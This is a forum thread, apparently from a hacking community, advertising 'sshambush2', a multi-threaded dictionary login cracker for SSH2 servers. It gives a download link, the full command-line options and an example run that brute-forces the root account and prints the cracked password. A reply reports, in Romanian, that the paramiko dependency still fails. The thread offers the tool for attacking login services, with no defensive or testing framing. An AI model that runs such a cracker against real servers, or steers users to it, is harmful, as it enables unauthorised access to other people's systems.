Jump to content
tur334vl

sshambush2 - multi-threaded SSH2 login cracker

Recommended Posts

Name: sshambush2

Version: 2.0

Author: s3my0n

[Description]

sshambush2 is a low memory use multi-threaded dictionary login cracker for SSH2 servers. It uses the paramiko module for connection, hence it is multi-platform (tested only on GNU/Linux and Windows 7) . sshambush2 does not load the password dictionary into its memory, but rather reads the opened file line by line, so it's great for very large dictionaries.

[Example]

s3my0n@linux:~/python/projects/sshambush$ ./sshambush.py -s 192.168.1.2 -l root -d ./passwords.txt 
.__ ___. .__ ________
______ ______| |__ _____ _____\_ |__ __ __ ______| |__ \_____ \
/ ___/ / ___/| | \\__ \ / \| __ \| | | ___/| | \ / ____/
\___ \ \___ \ | Y \/ __ \_| Y Y \ \_\ \ | |___ \ | Y | \
/____ >/____ >|___| (____ /|__|_| /___ /____/____ >|___| |_______ \
\/ \/ \/ \/ \/ \/ \/ \/ \/
sshambush2 v2.0
s3my0n RuSH4ck3R[at]gmail[dot]com
InterN0T.net
[*] Running SSH ambush on 127.0.0.1:22 ...

Ambushing: root
123/542 pass1232

[+] Login found:

Username: root
Password: pass12
[*] Total logins found: 1
[*] Done!
s3my0n@linux:~/python/projects/sshambush$

Help Screen:

Usage: sshambush2 -s <host> -l <login> [options]

[Options]
-s, --server: SSH server address (required)
-p, --port: SSH server port number (default: 22)
-l, --login: username dictionary file OR login username (default: root)
-d, --dictionary: password dictionary file (required)
-o, --output: write found logins to a file
-m, --maximum: maximum connections at a time (default: 10)
-t, --timeout: timeout on connection in seconds (default: 10)
-q, --quiet: quiet mode (for information output)
-h, --help: print this screen

[Video Demonstration]

Tutorial to use

[DOWNLOAD]

http://py1337.team-xpc.com/tools/sshambush2.zip

MD5 Sum of .ZIP:

148d4c96307c8df4e8b01f164d1c80d0

  • Upvote 1
Link to comment
Share on other sites

Name: sshambush2

Version: 2.0

Author: s3my0n

[Description]

sshambush2 is a low memory use multi-threaded dictionary login cracker for SSH2 servers. It uses the paramiko module for connection, hence it is multi-platform (tested only on GNU/Linux and Windows 7) . sshambush2 does not load the password dictionary into its memory, but rather reads the opened file line by line, so it's great for very large dictionaries.

[Example]

s3my0n@linux:~/python/projects/sshambush$ ./sshambush.py -s 192.168.1.2 -l root -d ./passwords.txt 
.__ ___. .__ ________
______ ______| |__ _____ _____\_ |__ __ __ ______| |__ \_____ \
/ ___/ / ___/| | \\__ \ / \| __ \| | | ___/| | \ / ____/
\___ \ \___ \ | Y \/ __ \_| Y Y \ \_\ \ | |___ \ | Y | \
/____ >/____ >|___| (____ /|__|_| /___ /____/____ >|___| |_______ \
\/ \/ \/ \/ \/ \/ \/ \/ \/
sshambush2 v2.0
s3my0n RuSH4ck3R[at]gmail[dot]com
InterN0T.net
[*] Running SSH ambush on 127.0.0.1:22 ...

Ambushing: root
123/542 pass1232

[+] Login found:

Username: root
Password: pass12
[*] Total logins found: 1
[*] Done!
s3my0n@linux:~/python/projects/sshambush$

Help Screen:

Usage: sshambush2 -s <host> -l <login> [options]

[Options]
-s, --server: SSH server address (required)
-p, --port: SSH server port number (default: 22)
-l, --login: username dictionary file OR login username (default: root)
-d, --dictionary: password dictionary file (required)
-o, --output: write found logins to a file
-m, --maximum: maximum connections at a time (default: 10)
-t, --timeout: timeout on connection in seconds (default: 10)
-q, --quiet: quiet mode (for information output)
-h, --help: print this screen

[Video Demonstration]

Tutorial to use

[DOWNLOAD]

http://py1337.team-xpc.com/tools/sshambush2.zip

MD5 Sum of .ZIP:

148d4c96307c8df4e8b01f164d1c80d0

Am instalat paramiko dar tot nu merge, zice ca nu-l are.

[-] Error: you need paramiko module:

paramiko: ssh2 protocol for python

For Debian/Ubuntu:

apt-get install python-paramiko

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...